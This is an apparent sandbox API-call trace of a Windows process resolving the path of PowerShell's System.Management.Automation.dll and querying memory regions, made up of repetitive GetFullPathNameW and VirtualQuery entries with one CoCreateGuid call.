	[0101.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.460] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.462] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.464] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.465] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.465] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.466] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.466] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.467] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.467] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.467] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.467] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.468] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.468] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.469] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.469] VirtualQuery (in: lpAddress=0xeb960, lpBuffer=0xec820, dwLength=0x30 | out: lpBuffer=0xec820*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.469] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.470] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.470] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.470] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.471] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x660e581d, Data2=0x16a1, Data3=0x4bc8, Data4=([0]=0x9c, [1]=0xd6, [2]=0xbe, [3]=0xaf, [4]=0x24, [5]=0xa2, [6]=0x40, [7]=0x31))) returned 0x0
	[0101.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.477] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.478] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.625] VirtualQuery (in: lpAddress=0xebd30, lpBuffer=0xecbf0, dwLength=0x30 | out: lpBuffer=0xecbf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.626] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.626] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.627] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.627] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.627] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.627] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.628] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.628] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.628] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.628] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
